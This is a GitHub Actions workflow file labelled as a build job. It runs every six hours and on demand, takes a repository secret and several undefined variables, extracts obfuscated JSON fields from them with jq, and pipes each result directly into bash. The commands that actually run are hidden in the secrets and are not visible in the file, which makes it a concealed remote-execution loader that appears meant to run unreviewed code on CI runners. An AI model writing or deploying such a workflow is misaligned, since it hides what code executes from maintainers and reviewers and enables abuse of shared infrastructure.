name: maxuexiao7614
on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maxuexiao7614
        env:
          q5: ${{ secrets.q5 }}
        run: |
          echo $q5 | jq -r .t683 | /bin/bash
          echo $mxtql2 | jq -r .vf47263 | /bin/bash
          echo $x6773 | jq -r .ya2 | /bin/bash
          echo $mm68949 | jq -r .nnp68717 | /bin/bash
          echo $qjsar6638 | jq -r .y99802 | /bin/bash
          echo $oojj47831 | jq -r .ruv4290 | /bin/bash
          echo $bwt1775 | jq -r .yews26 | /bin/bash
          echo $y6411 | jq -r .ffgeo3647 | /bin/bash

